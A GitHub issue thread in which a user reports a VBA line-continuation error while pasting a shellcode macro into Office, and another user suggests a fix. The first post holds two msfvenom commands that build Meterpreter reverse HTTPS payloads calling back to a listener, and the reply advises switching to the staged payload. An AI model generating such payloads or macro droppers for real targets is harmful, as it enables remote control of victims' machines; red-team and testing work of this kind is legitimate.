Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Error: Too many line continuations #3

Open
joeminicucci opened this issue Sep 2, 2019 · 2 comments
Open

Error: Too many line continuations #3

joeminicucci opened this issue Sep 2, 2019 · 2 comments

Comments

@joeminicucci
Copy link

Windows 10
Office 16 -> View Macros -> Opens Microsoft Visual Basic for Applications debugger
Paste in macro from the following msf payloads:

msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.0.2.15 lport=443 --platform windows -f raw -o shellcode64-encoded.bin -b '\x00'
msfvenom -p windows/meterpreter_reverse_https lhost=10.0.2.15 lport=443 --platform windows -f raw -o shellcode-encoded.bin -b '\x00'

Error on paste into the debugger:
image

@jeffmcjunkin
Copy link

Try windows/meterpreter/reverse_https instead of windows/meterpreter_reverse_https for that second msfvenom command. You're unintentionally (I think) doing a stageless payload, which is much bigger.

@joeminicucci
Copy link
Author

Sorry for the delay, Im going to test this again sometime this week. :) Thanks for the support Jeff.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants